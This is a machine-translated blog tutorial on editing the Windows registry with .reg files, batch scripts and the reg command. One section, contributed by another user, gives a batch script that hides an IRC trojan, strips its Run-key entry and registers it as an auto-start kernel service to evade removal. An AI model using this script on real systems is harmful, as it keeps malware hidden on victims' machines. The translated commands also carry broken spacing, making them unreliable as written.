Batch operation registry full strategy (read registry/write registry, etc)

1. Generate a. Reg file in batches to operate the Registry
You can easily generate the. reg file with the redirection symbol in the batch. Run the. reg file!
Here, I want to know how to operate the registry using the. reg file.
The first line of the. reg file must be Windows Registry Editor Version 5.00. Then the content of the Registry is operated.
(The file format is the same as that exported from the Registry)

1. Create a subitem
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ TTT]

A subitem named "TTT" is created under HKEY_LOCAL_MACHINE \ SOFTWARE.

2. Create a project nameCopy codeThe Code is as follows: Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ TTT]
"Name" = "ttt blog"
"EMail" = "taoether@gmail.com"
"URL" = "http://www.taoyoyo.net/ttt"
"Type" = dword: 02

In this way, the following four projects are created under [HKEY_LOCAL_MACHINE \ SOFTWARE \ TTT]: Name, EMail, URL, and Type.
The type of Name, Email, and URL is "String Value"
The Type is "DWORD Value"

(Appendix: windows registry value type:
REG_SZ string value
REG_BINARY binary value
REG_DWORD DWORD Value
REG_MULTI_SZ multi-string value
REG_EXPAND_SZ expandable string value)

3. Modify the key value
Modification is relatively simple. You only need to export the project you want to modify, use NotePad to modify it, and then import it (regedit/s. Just like creating a new one. You can modify multiple projects under the same subitem at a time.

4. Delete the project nameCopy codeThe Code is as follows: Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ TTT]
"EMail" =-

Execute this script and "EMail" will be deleted;

5. delete a subitemCopy codeThe Code is as follows: Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE \ SOFTWARE \ TTT]
[-HKEY_LOCAL_MACHINE \ SOFTWARE \ DDD]

Run the script to delete the subitem ttt and ddd.

6.. reg file execution Method
1) directly execute the reg file
2) regedit/s *. reg (/s no need to confirm)
3) reg import *. reg

7. In fact, we can also use dll files instead of reg files.

Batch Processing Example 1:Copy codeThe Code is as follows: @ echo off
Echo Windows Registry Editor Version 5.00> t1.reg
Echo.
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ TTT]> t1.reg
Echo "Name" = "ttt blog"> t1.reg
Echo "EMail" = "taoether@gmail.com"> t1.reg
Echo "URL" = "http://www.taoyoyo.net/ttt/"> t1.reg
Echo "Type" = dword: 02> t1.reg
Regedit/s t1.reg
Del/q t1.reg
Pause

Batch Processing 2: (this example is from another user, not quite understandable ~~)
When we are using some old Trojans, they may be in the Registry's [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run (Runonce, Runservices, Runexec)] generate a key value for Automatic startup of the Trojan. however, it is easy to expose the trojan program path, which leads to trojan detection and removal. It is relatively safer to register the trojan program as a system service. the following uses the configured IRC trojan DSNX as an example (named windrv32.exe)Copy codeThe Code is as follows: @ start windrv32.exe
@ Attrib + h + r windrv32.exe
@ Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]> patch. dll
@ Echo "windsnx" =-> patch. dll
@ SC .exe create Windriversrv type = kernel start = auto displayname = WindowsDriver binpath = c: \ winnt \ system32 \ windrv32.exe
@ Regedit/s patch. dll
@ Delete patch. dll
@ REM remove the startup Item of dsnxdein the registration table, use SC .exe to register it as a critical service of the system, set its attributes to hidden and read-only, and config as self-starting]
@ REM is not safer.

Ii. reg commands operate on the registry

The Reg command is a dedicated registry tool provided by Windows. You can easily query, add, delete, import, export, and compare operations. For details, refer to the built-in help ......

REG Operation [parameter list]
Operation [QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT]

1. query all subitem and Value
　　
D: \> reg query hklm \ software \ TTT

! REG. exe version 3.0

HKEY_LOCAL_MACHINE \ software \ TTT
Name REG_SZ TTT BLOG
EMail REG_SZ taoether@gmail.com
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2

2. query specific items

D: \> reg query hklm \ software \ ttt/v url

! REG. exe version 3.0

HKEY_LOCAL_MACHINE \ software \ ttt
Url REG_SZ http://www.taoyoyo.net/ttt/

The most difficult part here is how to obtain the desired string. After a long time, I finally found the method.
In the past, there was no good way to use the find and for loops to intercept the content we needed. (If you cannot understand the example below, please refer to another article in this blog: DOS loop-bat/batch processing for command details 2)
For example, to obtain the url key: http://www.taoyoyo.net/ttt/, you can use the following code:Copy codeThe Code is as follows: @ ECHO OFF
For/f "tokens = 1, 2, 3, 4, *" % I in ('reg query "HKEY_LOCAL_MACHINE \ software \ ttt" ^ | find/I "URL "') do SET "pURL = % k"
Echo ttt blog url value: % pURL %

Save as Test. bat. The running result is as follows:

D: \> test. bat
The ttt blog url value is: http://www.taoyoyo.net/ttt/

No. I don't know why my computer is running the "REG" command (including reg/?) in the command line /?), CPU usage is 100%. Check the task manager. CMD occupies more than 80%. I don't know why ......
Run other commands, including regedit/s ......

I checked the reason why the trojan was in progress on the Internet, but I did not check it. No relevant files are found, and no problem occurs when other commands are run ......
Don't do it first. There is a REG command at hand for detailed explanation. I will sort it out later!

Because of the virus detection, I used my own Clear. bat to Clear the C disk, and actually cleared 1 GB of space. There were only a few hundred megabytes left ...... There are so many windows spam ~~ Don't forget to clean it up frequently!

Release two more batch files to automatically monitor OutLook Express. If you need them, click to download them ......
1. OEMonitorCount. bat function: You can reset the number of OE opens in the Registry to avoid compression when more than 100 times are prompted.
2. OEMonitorSize. bat function: monitors the size of Outlook Express Mail Files (*. dbx) and generates alarm logs when the size is greater than the specified size.

These two files can be added to the Startup Group and run automatically at each startup!
These two problems mainly aim to solve the common problems of the company:
1) There are often more than a few G mail files;
2) Sometimes, emails may be lost after compression according to the prompts.

I just found that the downloaded file is suffixed with "htm". Please remove this suffix before using it!
In addition, please use the following link for downloading, such as qianniu Telecom high-speed and qianniu Netcom high-speed. The VIP link above is intended for thousands of users ~~